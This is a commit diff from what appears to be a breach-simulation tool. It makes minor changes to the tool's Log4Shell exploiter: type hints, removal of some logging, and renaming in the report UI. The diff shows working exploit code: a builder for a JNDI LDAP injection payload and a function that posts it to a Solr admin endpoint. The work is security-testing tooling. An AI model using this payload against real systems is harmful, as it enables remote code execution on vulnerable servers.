Agent, Island: Minor changes to Log4Shell

Return types, removing logging from solr service
and change Log4j to Log4Shell in Island reporting
This commit is contained in:
Ilija Lazoroski 2022-01-17 16:37:03 +01:00
parent 311a721880
commit 51bf553fb5
4 changed files with 7 additions and 9 deletions

View File

@ -116,12 +116,12 @@ class Log4ShellExploiter(WebRCE):
self._ldap_server.stop(Log4ShellExploiter.DOWNLOAD_TIMEOUT) self._ldap_server.stop(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
def _build_ldap_payload(self): def _build_ldap_payload(self) -> str:
interface_ip = get_interface_to_target(self.host.ip_addr) interface_ip = get_interface_to_target(self.host.ip_addr)
return f"${{jndi:ldap://{interface_ip}:{self._ldap_port}/dn=Exploit}}" return f"${{jndi:ldap://{interface_ip}:{self._ldap_port}/dn=Exploit}}"
# TODO remove duplication with infection_monkey.exploit.hadoop.HadoopExploiter.build_command # TODO remove duplication with infection_monkey.exploit.hadoop.HadoopExploiter.build_command
def _build_command(self, path, http_path): def _build_command(self, path, http_path) -> str:
# Build command to execute # Build command to execute
monkey_cmd = build_monkey_commandline( monkey_cmd = build_monkey_commandline(
self.host, get_monkey_depth() - 1, vulnerable_port=None, location=path self.host, get_monkey_depth() - 1, vulnerable_port=None, location=path

View File

@ -15,8 +15,6 @@ class SolrExploit(IServiceExploiter):
def trigger_exploit(payload: str, host: VictimHost, port: int): def trigger_exploit(payload: str, host: VictimHost, port: int):
url = f"http://{host.ip_addr}:{port}/solr/admin/cores?fu={payload}" url = f"http://{host.ip_addr}:{port}/solr/admin/cores?fu={payload}"
try: try:
logger.debug("Sending malicious SOLR log4j request")
requests.post(url, timeout=5, verify=False) # noqa DUO123 requests.post(url, timeout=5, verify=False) # noqa DUO123
logger.debug("Request sent")
except requests.ReadTimeout as e: except requests.ReadTimeout as e:
logger.debug(f"Log4shell request failed {e}") logger.debug(f"Log4shell request failed {e}")

View File

@ -55,7 +55,7 @@ class ExploiterDescriptorEnum(Enum):
POWERSHELL = ExploiterDescriptor( POWERSHELL = ExploiterDescriptor(
"PowerShellExploiter", "PowerShell Remoting Exploiter", ExploitProcessor "PowerShellExploiter", "PowerShell Remoting Exploiter", ExploitProcessor
) )
LOG4SHELL = ExploiterDescriptor("Log4ShellExploiter", "Log4j Exploiter", Log4ShellProcessor) LOG4SHELL = ExploiterDescriptor("Log4ShellExploiter", "Log4Shell Exploiter", Log4ShellProcessor)
@staticmethod @staticmethod
def get_by_class_name(class_name: str) -> ExploiterDescriptor: def get_by_class_name(class_name: str) -> ExploiterDescriptor:

View File

@ -2,19 +2,19 @@ import React from 'react';
import CollapsibleWellComponent from '../CollapsibleWell'; import CollapsibleWellComponent from '../CollapsibleWell';
export function log4shellIssueOverview() { export function log4shellIssueOverview() {
return (<li>Some servers are vulnerable to log4shell remote code execution exploit.</li>) return (<li>Some servers are vulnerable to the Log4Shell remote code execution exploit.</li>)
} }
export function log4shellIssueReport(issue) { export function log4shellIssueReport(issue) {
return ( return (
<> <>
Upgrade the log4j component to version 2.15.0 or later. Upgrade the Apache Log4j component to version 2.15.0 or later.
<CollapsibleWellComponent> <CollapsibleWellComponent>
The {issue.service} server <span className="badge badge-primary">{issue.machine}</span> (<span The {issue.service} server <span className="badge badge-primary">{issue.machine}</span> (<span
className="badge badge-info" style={{margin: '2px'}}>{issue.ip_address}:{issue.port}</span>) is vulnerable to <span className="badge badge-info" style={{margin: '2px'}}>{issue.ip_address}:{issue.port}</span>) is vulnerable to <span
className="badge badge-danger">log4shell remote code execution</span> attack. className="badge badge-danger">the Log4Shell remote code execution</span> attack.
<br/> <br/>
The attack was made possible due to an old version of log4j component. The attack was made possible due to an old version of Apache Log4j component.
</CollapsibleWellComponent> </CollapsibleWellComponent>
</> </>
); );